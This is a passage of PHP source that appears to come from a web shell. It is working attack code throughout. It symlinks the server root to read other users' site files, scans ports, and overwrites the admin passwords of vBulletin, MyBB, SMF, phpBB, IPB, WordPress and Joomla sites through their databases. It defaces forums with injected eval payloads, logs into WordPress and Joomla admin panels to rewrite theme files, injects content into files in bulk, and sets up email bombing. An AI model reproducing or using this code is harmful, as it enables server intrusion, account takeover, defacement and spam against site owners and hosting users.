2815 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
2816 </tr>
2817 <tr>
2818 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
2819 </tr>
2820 </table>
2821 </form>
2822 </div>
2823 <?php
2824 $TEST=@file('/etc/passwd');
2825 if ($TEST)
2826 {
2827 @mkdir("dhanush",0777);
2828 @chdir("dhanush");
2829 execmd("ln -s /root");
2830
2831$file3 = 'Options all
2832 DirectoryIndex Sux.html
2833 AddType text/plain .php
2834 AddHandler server-parsed .php
2835 AddType text/plain .html
2836 AddHandler txt .html
2837 Require None
2838 Satisfy Any
2839 ';
2840 $fp3 = fopen('.htaccess','w');
2841 $fw3 = fwrite($fp3,$file3);
2842 @fclose($fp3);
2843
2844 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
2845
2846
2847 $dcount = 1;
2848 $file = fopen("/etc/passwd", "r");
2849 //Output a line of the file until the end is reached
2850 while(!feof($file))
2851 {
2852 $s = fgets($file);
2853 $matches = array();
2854 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2855 $matches = str_replace("home/","",$matches[1]);
2856 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2857 continue;
2858 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
2859 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2860 $dcount++;
2861 }
2862 fclose($file);
2863
2864 echo "</table>";
2865 }
2866 else
2867 {
2868 @mkdir("dhanush",0777);
2869 @chdir("dhanush");
2870 execmd("ln -s / root");
2871 $file3 = 'Options all
2872 DirectoryIndex Sux.html
2873 AddType text/plain .php
2874 AddHandler server-parsed .php
2875 AddType text/plain .html
2876 AddHandler txt .html
2877 Require None
2878 Satisfy Any
2879 ';
2880 $fp3 = fopen('.htaccess','w');
2881 $fw3 = fwrite($fp3,$file3);
2882 @fclose($fp3);
2883
2884 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
2885
2886 $temp = "";
2887 $val1 = 0;
2888 $val2 = 1000;
2889 for(;$val1 <= $val2;$val1++)
2890 {
2891 $uid = @posix_getpwuid($val1);
2892 if ($uid)
2893 $temp .= join(':',$uid)."\n";
2894 }
2895 echo '<br/>';
2896 $temp = trim($temp);
2897
2898 $file5 = fopen("test.txt","w");
2899 fputs($file5,$temp);
2900 fclose($file5);
2901
2902 $dcount = 1;
2903 $file = fopen("test.txt", "r");
2904 while(!feof($file))
2905 {
2906 $s = fgets($file);
2907 $matches = array();
2908 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2909 $matches = str_replace("home/","",$matches[1]);
2910 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2911 continue;
2912 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
2913 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2914 $dcount++;
2915 }
2916 fclose($file);
2917 echo "</table>";
2918 unlink("test.txt");
2919 }
2920 }
2921 else
2922 echo "<center><font size=4 >Cannot create Symlink</font></center>";
2923 }
2924}
2925else if(isset($_GET['host']) && isset($_GET['protocol']))
2926{
2927 echo "Open Ports: ";
2928 $host = $_GET['host'];
2929 $proto = $_GET['protocol'];
2930 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
2931 for($current = 0; $current <= 23; $current++)
2932 {
2933 $currents = $myports[$current];
2934 $service = getservbyport($currents, $proto);
2935 // Try to connect to port
2936 $result = fsockopen($host, $currents, $errno, $errstr, 1);
2937 // Show results
2938 if($result)
2939 echo "<font class=txt>$currents, </font>";
2940 }
2941}
2942else if(isset($_REQUEST['forumpass']))
2943{
2944 $localhost = $_GET['f1'];
2945 $database = $_GET['f2'];
2946 $username = $_GET['f3'];
2947 $password = $_GET['f4'];
2948 $prefix = $_GET['prefix'];
2949 $newpass = $_GET['newpass'];
2950 $uid = $_GET['uid'];
2951
2952 if($_GET['forums'] == "vb")
2953 {
2954 $newpass = $_GET['newipbpass'];
2955 $uid = $_GET['ipbuid'];
2956 $con = mysql_connect($localhost,$username,$password);
2957 $db = mysql_select_db($database,$con);
2958 $salt = "eghjghrtd";
2959 $newpassword = md5(md5($newpass) . $salt);
2960 if($prefix == "" || $prefix == null)
2961 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
2962 else
2963 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
2964 if($sql)
2965 {
2966 mysql_close($con);
2967 echo "<font class=txt>Password Changed Successfully</font>";
2968 }
2969 else
2970 echo "Cannot Change Password";
2971 }
2972 else if($_GET['forums'] == "mybb")
2973 {
2974 $newpass = $_GET['newipbpass'];
2975 $uid = $_GET['ipbuid'];
2976 $con = mysql_connect($localhost,$username,$password);
2977 $db = mysql_select_db($database,$con);
2978 $salt = "jeghj";
2979 $newpassword = md5(md5($salt).md5($newpass));
2980 if($prefix == "" || $prefix == null)
2981 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
2982 else
2983 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
2984 if($sql)
2985 {
2986 mysql_close($con);
2987 echo "<font class=txt>Password Changed Successfully</font>";
2988 }
2989 else
2990 echo "Cannot Change Password";
2991 }
2992 else if($_GET['forums'] == "smf")
2993 {
2994 $newpass = $_GET['newipbpass'];
2995 $uid = $_GET['ipbuid'];
2996 $con = mysql_connect($localhost,$username,$password);
2997 $db = mysql_select_db($database,$con);
2998
2999 if($prefix == "" || $prefix == null)
3000 {
3001 $result = mysql_query("select member_name from smf_members where id_member = $uid");
3002 $row = mysql_fetch_array($result);
3003 $membername = $row['member_name'];
3004 $newpassword = sha1(strtolower($membername).$newpass);
3005 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
3006 }
3007 else
3008
3009 {
3010 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
3011 $row = mysql_fetch_array($result);
3012 $membername = $row['member_name'];
3013 $newpassword = sha1(strtolower($membername).$newpass);
3014 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
3015 }
3016 if($sql)
3017 {
3018 mysql_close($con);
3019 echo "<font class=txt>Password Changed Successfully</font>";
3020 }
3021 else
3022 echo "Cannot Change Password";
3023 }
3024 else if($_GET['forums'] == "phpbb")
3025 {
3026 $newpass = $_POST['newipbpass'];
3027 $uid = $_POST['ipbuid'];
3028 $con = mysql_connect($localhost,$username,$password);
3029 $db = mysql_select_db($database,$con);
3030
3031 $newpassword = md5($newpass);
3032 if(empty($prefix) || $prefix == null)
3033 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
3034 else
3035 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
3036 if($sql)
3037 {
3038 mysql_close($con);
3039 echo "<font class=txt>Password Changed Successfully</font>";
3040 }
3041 else
3042 echo "Cannot Change Password";
3043 }
3044 else if($_GET['forums'] == "ipb")
3045 {
3046 $newpass = $_POST['newipbpass'];
3047 $uid = $_POST['ipbuid'];
3048 $con = mysql_connect($localhost,$username,$password);
3049 $db = mysql_select_db($database,$con);
3050 $salt = "eghj";
3051 $newpassword = md5(md5($salt).md5($newpass));
3052 if($prefix == "" || $prefix == null)
3053 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
3054 else
3055 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
3056 if($sql)
3057 {
3058 mysql_close($con);
3059 echo "<font class=txt>Password Changed Successfully</font>";
3060 }
3061 else
3062 echo "Cannot Change Password";
3063 }
3064 else if($_GET['forums'] == "wp")
3065 {
3066 $uname = $_GET['uname'];
3067 $con = mysql_connect($localhost,$username,$password);
3068 $db = mysql_select_db($database,$con);
3069
3070 $newpassword = md5($newpass);
3071 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname'");
3072 if($sql)
3073 {
3074 mysql_close($con);
3075 echo "<font class=txt>Password Changed Successfully</font>";
3076 }
3077 else
3078 echo "Cannot Change Password";
3079 }
3080 else if($_GET['forums'] == "joomla")
3081 {
3082 $newjoomlapass = $_GET['newjoomlapass'];
3083 $joomlauname = $_GET['username'];
3084 $con = mysql_connect($localhost,$username,$password);
3085 $db = mysql_select_db($database,$con);
3086
3087 $newpassword = md5($newjoomlapass);
3088 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname'");
3089 if($sql)
3090 {
3091 mysql_close($con);
3092 echo "<font class=txt>Password Changed Successfully</font>";
3093 }
3094 else
3095 echo "Cannot Change Password";
3096 }
3097}
3098else if(isset($_POST['forumdeface']))
3099{
3100 $localhost = $_POST['f1'];
3101 $database = $_POST['f2'];
3102 $username = $_POST['f3'];
3103 $password = $_POST['f4'];
3104 $index = $_POST['index'];
3105 $prefix = $_POST['tableprefix'];
3106
3107 if($_POST['forumdeface'] == "vb")
3108 {
3109 $con =@ mysql_connect($localhost,$username,$password);
3110 $db =@ mysql_select_db($database,$con);
3111 $index=str_replace('"','\\"',$index);
3112 $attack = "{\${eval(base64_decode(\'";
3113 $attack .= base64_encode("echo \"$index\";");
3114 $attack .= "\'))}}{\${exit()}}</textarea>";
3115 if($prefix == "" || $prefix == null)
3116 $query = "UPDATE template SET template = '$attack'";
3117 else
3118 $query = "UPDATE ".$prefix."template SET template = '$attack'";
3119 $result =@ mysql_query($query,$con);
3120 if($result)
3121 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
3122 else
3123 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
3124 }
3125 else if($_POST['forumdeface'] == "mybb")
3126 {
3127 $con =@ mysql_connect($localhost,$username,$password);
3128 $db =@ mysql_select_db($database,$con);
3129 $attack = "{\${eval(base64_decode(\'";
3130 $attack .= base64_encode("echo \"$index\";");
3131 $attack .= "\'))}}{\${exit()}}</textarea>";
3132 $attack = str_replace('"',"\\'",$attack);
3133
3134 if($prefix == "" || $prefix == null)
3135 $query = "UPDATE mybb_templates SET template = '$attack'";
3136 else
3137 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
3138 $result =@ mysql_query($query,$con);
3139 if($result)
3140 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
3141 else
3142 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
3143 }
3144 else if($_POST['forumdeface'] == "smf")
3145 {
3146 $head = $_POST['head'];
3147 $catid = $_POST['f5'];
3148
3149 $con =@ mysql_connect($localhost,$username,$password);
3150 $db =@ mysql_select_db($database,$con);
3151 if($prefix == "" || $prefix == null)
3152 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3153 else
3154 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3155 $result =@ mysql_query($query,$con);
3156 if($result)
3157 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
3158 else
3159 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
3160 }
3161 else if($_POST['forumdeface'] == "ipb")
3162 {
3163 $head = $_POST['head'];
3164 $catid = $_POST['f5'];
3165
3166 $IPB = "forums";
3167 $con =@ mysql_connect($localhost,$username,$password);
3168 $db =@ mysql_select_db($database,$con);
3169 if($prefix == "" || $prefix == null)
3170 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
3171 else
3172 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
3173 if($result)
3174 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
3175 else
3176
3177 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
3178 }
3179 else if($_POST['forumdeface'] == "wp")
3180 {
3181 $site_url = $_POST['siteurl'];
3182 $index = urlencode($index);
3183 $con =@ mysql_connect($localhost,$username,$password);
3184 $db =@ mysql_select_db($database,$con);
3185 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
3186 echo("<br>[+] Changing admin password to 123456789<br>");
3187
3188 if($req1)
3189 {
3190 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
3191 $data = mysql_fetch_array($req);
3192 if(empty($site_url))
3193 $site_url=$data["option_value"];
3194 $output .= "Site : ".$site_url."<br>";
3195
3196 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
3197 $data = mysql_fetch_array($req);
3198 $template = $data["option_value"];
3199
3200 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
3201 $data = mysql_fetch_array($req);
3202 $current_theme = $data["option_value"];
3203
3204 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
3205 $url2=$site_url."/wp-login.php";
3206
3207 $ch = curl_init();
3208 curl_setopt($ch, CURLOPT_URL, $url2);
3209 curl_setopt($ch, CURLOPT_POST, 1);
3210 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
3211 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3212 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3213 curl_setopt($ch, CURLOPT_HEADER, 0);
3214 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
3215 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3216 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3217 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3218 $buffer = curl_exec($ch);
3219
3220 $pos = strpos($buffer,"action=logout");
3221 if($pos === false) {
3222 $output.= "[-] Successful Login<br />";
3223 } else {
3224 $output.= "[+] Successful Login<br />";
3225 }
3226
3227 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
3228 curl_setopt($ch, CURLOPT_URL, $url2);
3229 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
3230 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3231 curl_setopt($ch, CURLOPT_HEADER, 0);
3232 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3233 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3234 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3235 $buffer0 = curl_exec($ch);
3236
3237 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
3238 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
3239
3240 if(substr_count($_file,"index.php") != 0)
3241 {
3242 $url2=$site_url."/wp-admin/theme-editor.php";
3243 curl_setopt($ch, CURLOPT_URL, $url2);
3244 curl_setopt($ch, CURLOPT_POST, 1);
3245 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
3246 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3247 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3248 curl_setopt($ch, CURLOPT_HEADER, 0);
3249 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3250 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3251 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3252 $buffer = curl_exec($ch);
3253 curl_close($ch);
3254
3255 $pos = strpos($buffer,'<div id="message" class="updated">');
3256 $cond = 0;
3257 if($pos === false) {
3258 $output.= "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
3259 } else {
3260 $output.= "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3261 $cond = 1;
3262 }
3263 }
3264 else
3265 {
3266 $url2=$site_url.'/wp-admin/theme-editor.php?file=/themes/'.$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
3267 curl_setopt($ch, CURLOPT_URL, $url2);
3268 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
3269 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3270 curl_setopt($ch, CURLOPT_HEADER, 0);
3271 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3272 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3273 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3274 $buffer0 = curl_exec($ch);
3275
3276 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
3277 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
3278
3279
3280 $url2=$site_url."/wp-admin/theme-editor.php";
3281 curl_setopt($ch, CURLOPT_URL, $url2);
3282 curl_setopt($ch, CURLOPT_POST, 1);
3283 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
3284 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3285 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3286 curl_setopt($ch, CURLOPT_HEADER, 0);
3287 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3288 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3289 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3290 $buffer = curl_exec($ch);
3291 curl_close($ch);
3292
3293 $pos = strpos($buffer,'<div id="message" class="updated">');
3294 $cond = 0;
3295 if($pos === false) {
3296 $output.= "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
3297 } else {
3298 $output.= "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3299 $cond = 1;
3300 }
3301 }
3302 } else {
3303 $output.= "[-] DB Error<br />";
3304 }
3305 echo $output;
3306 global $base_path;
3307 unlink($base_path.'COOKIE.txt');
3308 }
3309 else if($_POST['forumdeface'] == "joomla")
3310 {
3311 $site_url = $_POST['siteurl'];
3312 $dbprefix = $_POST['tableprefix'];
3313 $dbname = $_POST['f2'];
3314 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
3315
3316 $co=randomt();
3317
3318 $link=mysql_connect($localhost,$username,$password) ;
3319 mysql_select_db($dbname,$link);
3320
3321 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
3322
3323 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
3324
3325 if ( $req )
3326 {
3327 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
3328 $data = mysql_fetch_array($req);
3329 $template_name=$data["template"];
3330
3331 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
3332 $data = mysql_fetch_array($req);
3333 $template_id=$data["extension_id"];
3334
3335 $url2=$site_url."/index.php";
3336
3337 $ch = curl_init();
3338 curl_setopt($ch, CURLOPT_URL, $url2);
3339 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3340 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3341 curl_setopt($ch, CURLOPT_HEADER, 1);
3342 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3343 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3344 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3345
3346
3347 $buffer = curl_exec($ch);
3348
3349 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
3350 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
3351
3352
3353 $url2=$site_url."/index.php";
3354 $ch = curl_init();
3355 curl_setopt($ch, CURLOPT_URL, $url2);
3356 curl_setopt($ch, CURLOPT_POST, 1);
3357 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
3358 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3359 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3360 curl_setopt($ch, CURLOPT_HEADER, 0);
3361 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3362 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3363 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3364 $buffer = curl_exec($ch);
3365
3366 $pos = strpos($buffer,"com_config");
3367 if($pos === false)
3368 {
3369 echo("<br>[-] Login Error");
3370 exit;
3371 }
3372
3373 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
3374 $ch = curl_init();
3375 curl_setopt($ch, CURLOPT_URL, $url2);
3376 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3377 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3378 curl_setopt($ch, CURLOPT_HEADER, 0);
3379 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3380 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3381
3382 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3383 $buffer = curl_exec($ch);
3384
3385 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
3386 if(!$hidden2)
3387 {
3388 echo("<br>[-] index.php Not found in Theme Editor");
3389 exit;
3390 }
3391
3392 $url2=$site_url."/index.php?option=com_templates&layout=edit";
3393
3394 $ch = curl_init();
3395 curl_setopt($ch, CURLOPT_URL, $url2);
3396 curl_setopt($ch, CURLOPT_POST, 1);
3397 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
3398
3399 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3400 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3401 curl_setopt($ch, CURLOPT_HEADER, 0);
3402 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3403 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3404 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3405 $buffer = curl_exec($ch);
3406
3407 $pos = strpos($buffer,'<dd class="message message">');
3408 if($pos === false)
3409 {
3410 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
3411 }
3412 else
3413 {
3414 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3415 }
3416 }
3417 else
3418 {
3419 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
3420 $data = mysql_fetch_array($req);
3421 $template_name=$data["template"];
3422
3423 $url2=$site_url."/index.php";
3424 $ch = curl_init();
3425 curl_setopt($ch, CURLOPT_URL, $url2);
3426 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3427 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3428 curl_setopt($ch, CURLOPT_HEADER, 1);
3429 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3430 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3431 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3432 $buffer = curl_exec($ch);
3433
3434 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
3435
3436 $url2=$site_url."/index.php";
3437 $ch = curl_init();
3438 curl_setopt($ch, CURLOPT_URL, $url2);
3439 curl_setopt($ch, CURLOPT_POST, 1);
3440 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
3441 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3442 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3443 curl_setopt($ch, CURLOPT_HEADER, 0);
3444 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3445 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3446 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3447 $buffer = curl_exec($ch);
3448
3449 $pos = strpos($buffer,"com_config");
3450
3451 if($pos === false)
3452 {
3453 echo("<br>[-] Login Error");
3454 exit;
3455 }
3456
3457 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
3458 $ch = curl_init();
3459 curl_setopt($ch, CURLOPT_URL, $url2);
3460 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3461 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3462 curl_setopt($ch, CURLOPT_HEADER, 0);
3463 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3464 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3465 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3466 $buffer = curl_exec($ch);
3467
3468 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
3469
3470 if(!$hidden2)
3471 {
3472 echo("<br>[-] index.php Not found in Theme Editor");
3473 }
3474
3475 $url2=$site_url."/index.php?option=com_templates&layout=edit";
3476 $ch = curl_init();
3477 curl_setopt($ch, CURLOPT_URL, $url2);
3478 curl_setopt($ch, CURLOPT_POST, 1);
3479 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
3480 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3481 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3482 curl_setopt($ch, CURLOPT_HEADER, 0);
3483 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3484 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3485 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3486 $buffer = curl_exec($ch);
3487
3488 $pos = strpos($buffer,'<dd class="message message fade">');
3489 if($pos === false)
3490 {
3491 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
3492 exit;
3493 }
3494 else
3495 {
3496 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3497 }
3498 }
3499 }
3500}
3501else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
3502{
3503 $filetype = $_POST['filetype'];
3504
3505 $mode = "a";
3506
3507 if($_POST['mode'] == 'Apender')
3508 $mode = "a";
3509
3510 if($_POST['mode'] == 'Overwriter')
3511 $mode = "w";
3512
3513 if (is_dir($_POST['pathtomass']))
3514 {
3515 $lolinject = $_POST['injectthis'];
3516 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
3517 if(substr($_POST['pathtomass'], -1) == "\\")
3518 $mypath = $_POST['pathtomass'] . "*.".$filetype;
3519 foreach (glob($mypath) as $injectj00)
3520 {
3521 /*if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3522 continue;
3523 $fp=fopen($injectj00,$mode);
3524 if (fputs($fp,$lolinject))
3525 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
3526 else
3527 echo 'failed to inject '.$injectj00.'<br>';*/
3528 }
3529 $dirs = glob($_POST['pathtomass'] . '/*' , GLOB_ONLYDIR);
3530 foreach ($dirs as $dir)
3531 {
3532 injectdir($dir,$filetype,$mode,$lolinject);
3533 }
3534 }
3535 else
3536 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
3537}
3538else if(isset($_POST['mailfunction']))
3539{
3540 if($_POST['mailfunction'] == "dobombing")
3541 {
3542 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
3543 {
3544 $times = $_POST['times'];
3545 while($times--)
3546 {
3547 if(isset($_POST['padding']))
3548 {
3549 $fromPadd = rand(0,9999);
3550 $subjectPadd = " -- ID : ".rand(0,9999999);
3551 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
3552
3553 }
3554 $from = "hello$fromPadd@abcd.in";
